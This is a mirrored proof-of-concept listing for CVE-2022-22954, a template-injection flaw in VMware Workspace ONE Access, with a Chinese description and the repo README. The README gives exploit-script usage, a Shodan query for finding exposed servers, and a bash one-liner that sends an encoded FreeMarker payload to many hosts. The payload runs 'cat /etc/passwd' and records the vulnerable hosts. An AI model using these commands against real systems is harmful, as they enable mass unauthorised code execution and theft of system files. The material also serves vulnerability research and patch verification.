CVE-2022-22954 PoC — VMware 多款产品代码注入漏洞

Source

https://github.com/aniqfakhrul/CVE-2022-22954

Associated Vulnerability

Title:VMware 多款产品代码注入漏洞 (CVE-2022-22954)
Description:Vmware Workspace One Access是美国Vmware公司的将用户身份与设备和网络信息等因素结合起来，为 Workspace One 交付的应用程序制定智能驱动的条件访问决策。 VMware 多款产品存在代码注入漏洞，该漏洞源于不正确的输入验证。远程攻击者利用该漏洞发送特制的HTTP请求并执行服务器端模板注入。

Readme

# CVE-2022-22954

## Attention
> Please use this at your own risk. This repo is meant only for educational purposes and we are strictly against all illegal intentions and we would not be responsible of any illegal activities associated with this repo. Be ethical!

## Example
```
python3 CVE-2022-22954.py -t target.com
python3 CVE-2022-22954.py -t 10.10.10.10
```

## Shodan Query
```
shodan search "http.favicon.hash:-1250474341" --limit 1000
```

## Bash one liner
```bash
cat list_vm_one.txt | awk '{print $1":"$2}'  > vm_one.txt
cat vm_one.txt | while read host do;do curl --max-time 2 --silent --path-as-is --insecure "$host/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" | grep "root:*" && echo "$host [Vulnerable]" >> vuln_vm_one_ssti.txt;done
```

File Snapshot


 [4.0K]  /data/pocs/4748122f81390a5605cda4050ee6acfa878e28d6
├── [2.0K]  CVE-2022-22954.py
└── [ 955]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!